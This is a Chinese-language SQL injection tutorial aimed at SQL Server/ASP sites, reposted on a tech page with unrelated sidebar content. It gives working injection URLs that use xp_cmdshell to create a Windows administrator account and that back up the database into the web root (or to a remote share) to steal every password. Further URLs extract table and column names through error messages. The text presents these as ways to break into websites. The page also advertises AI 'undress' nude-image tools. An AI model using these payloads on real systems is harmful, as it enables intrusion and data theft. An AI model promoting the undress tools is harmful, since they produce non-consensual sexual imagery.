SQL注入漏洞全接触--高级篇(一)_MySQL
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。
第一节、利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
① http://Site/url.ASP?id=1;exec master..xp_cmdshell “net user name password /add”--
分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:
② http://Site/url.ASP?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
③ http://Site/url.ASP?id=1 ;;and db_name()>0
前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。
④ http://Site/url.ASP?id=1;backup database 数据库名 to disk=’c:/inetpub/wwwroot/1.db’;--
这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如//202.96.xx.xx/Share/1.db),但成功率不高。
⑤ http://Site/url.ASP?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
⑥ http://Site/url.ASP?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0
从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1389
52
What is the evaluation of win10 LTSC version?
Dec 25, 2023 pm 04:25 PM
Many friends are not sure whether the win10ltsc version is good or not. In fact, this version is very good compared to other versions. The software is very clean and there are no other redundant apps, so it is still relatively good. How about the win10ltsc version: A: Relatively speaking, the win10ltsc version is still very good. The content is very clean, and it is very suitable for downloading by friends who like cleanliness. Overview of the main advantages of Win10 LTSC version: Advantage 1: This version eliminates additional applications, Edge browser and Cortana, fully demonstrating its streamlined features and avoiding unnecessary interference caused by user misoperation. At the same time, the service is more simplified and the running speed is correspondingly improved. Advantage two: 1. For most
What is the overall evaluation of Windows 10 Enterprise 2016 Long Term Service Edition?
Jan 15, 2024 pm 03:18 PM
There are many systems in win10 that you can choose to use. Among them, win10 enterprise version 2016 long-term service version is a relatively easy-to-use system version. It is very good in terms of functions and everything. If you use it daily, this system version can be said to be very useful. superior. How about the win10 enterprise version 2016 long-term service version? Answer: The performance is very good. This product is specially designed for enterprise-level customers and is committed to building a stable, efficient and extremely secure computing environment. Introduction to win10 enterprise version 2016 long-term service version 1. Guarantee: Windows 2016 enterprise version long-term service sincerely provides users with full mainstream support for up to five years and in-depth extended support of the same length 2. The system has been checked at all levels
What is the future potential of POLYDOGE coin analyzed in one article?
Jul 15, 2024 pm 05:24 PM
The full English name of POLYDOGE coin is PolyDoge. In fact, this Polydoge is a meme community token on polygon. NFTs with the theme of Polydoge have been issued and they have begun to cooperate with Netvrk to develop the PlaytoEarn game. POLYDOGE is a token born on the Polygon network and it was also the first meme coin on the chain. Just a few days ago it became cross-chain and can be found on Crypto.com’s Cronos network. There are rumors that the famous Binance Smart Chain is also about to be released. Many investors want to know what the future potential of this POLYDOGE coin is? Let me tell you about it below
What about EDU coins? Is it still valuable?
Jul 11, 2024 pm 05:05 PM
Blockchain technology is widely used and has changed the structure of many industries, but it has not yet been developed and applied in the education field. It is against this background that OpenCampus (EDU) was developed. After the EDU coin sale was launched on Binance Launchpad in 2023, the project borrowed It has developed strongly and expanded its coverage and influence. How about investors paying more attention to this EDU coin? Before some investors decided to invest in the currency, they found that it reached a record low of $0.3748 in October. This made investors worry about whether the EDU currency is still valuable? In fact, according to the current data, EDU currency is still good and has certain investment value. The editor will talk about it in detail below. What about EDU coins? At present, the performance of EDU currency is not bad. According to
How about Xiaomi 4 mobile phone? Latest Xiaomi 4 introduction
Mar 24, 2024 pm 01:31 PM
Recently, domestically produced mobile phones have become more and more powerful, releasing various series of flagship phones and "thousand-yuan phones" with extremely high cost performance. Just before, Xiaomi released Xiaomi Mi 5C. Although it is Xiaomi's initial trial product, Zhao Zhifu is still very optimistic about Xiaomi. I hope Can we catch up with Huawei? Well, let’s get into the topic. The protagonist this time is Xiaomi 4. Xiaomi mobile phone 4 is equipped with Qualcomm Snapdragon 801 (V3) 2.5GHz processor and has a running memory of 3GB RAM and 16/64GB ROM. (The mainstream operation at the time Most of the memory is kept at 1/2GB). Xiaomi 4 has 3GB of running memory. This configuration was considered powerful at the time. The rear camera is a 13-megapixel SonyIMX214, an 8-megapixel front camera, and the screen is 5-inch 1080p. This is
How does the Edge browser perform in win7?
Dec 27, 2023 pm 03:51 PM
The edge browser is a newly developed browser by Microsoft. The core is completely different from the previous IE browser. Some users can also use the edge browser on win7 system after operation. So how is this browser used? This article This article will briefly explain it to you. How about win7edge browser? Answer: The Edge browser is quite good, because its core is completely different from the previously controversial IE browser. It also uses different codes and optimization algorithms, and its performance is more outstanding. The edge browser has also added a graffiti mode, which allows users to graffiti directly on the browser. The reading mode is even more convenient. It not only supports users to set the page layout by themselves, but also does not have any advertisements, and fonts and backgrounds can also be used.
How do you evaluate the pairing of 13600kf with Gigabyte b760 (11700k paired with Gigabyte Xiaodiao)?
Jan 02, 2024 am 08:35 AM
How about pairing 13600kf with Gigabyte b760? 1. The combination effect is good. 2. Because the 13600kf is a high-performance processor from Intel, and the Gigabyte b760 is a motherboard with stable performance, the combination of the two can give full play to the performance of the processor and provide a smooth computing and gaming experience. 3. In addition, Gigabyte b760 also has good scalability and stability, and can support the connection and operation of a variety of hardware devices, providing users with more choices and convenience. Therefore, pairing 13600kf and Gigabyte b760 can not only meet users' needs for high-performance computing and games, but also have good stability and reliability. It is a relatively good choice to pair with 13600kf and Gigabyte b760. 13600kf is a cost-effective
What about ABS coins? Is ABS coin worth investing in?
Jul 16, 2024 pm 12:00 PM
The full English name of ABS currency is Autobusd. In fact, the AutoBUSD project is a special project of ABS tokens. It is mainly used on trading platforms. The purpose of this project is to automatically trade gold. The project is not only able to analyze price trends but also read the direction of price trends, helping users to make buy or sell trades and make decisions to close positions in order to take profits or cut them. In addition, all losses in this project are carried out automatically and do not require manual instructions. So what exactly is ABS coin like? Many investors want to know whether ABS coins are worth investing in? Let me tell you about it below. What about ABS coins? According to the editor's investigation, the number of ABS projects listed on exchanges has returned to zero, so it is no longer possible to purchase A
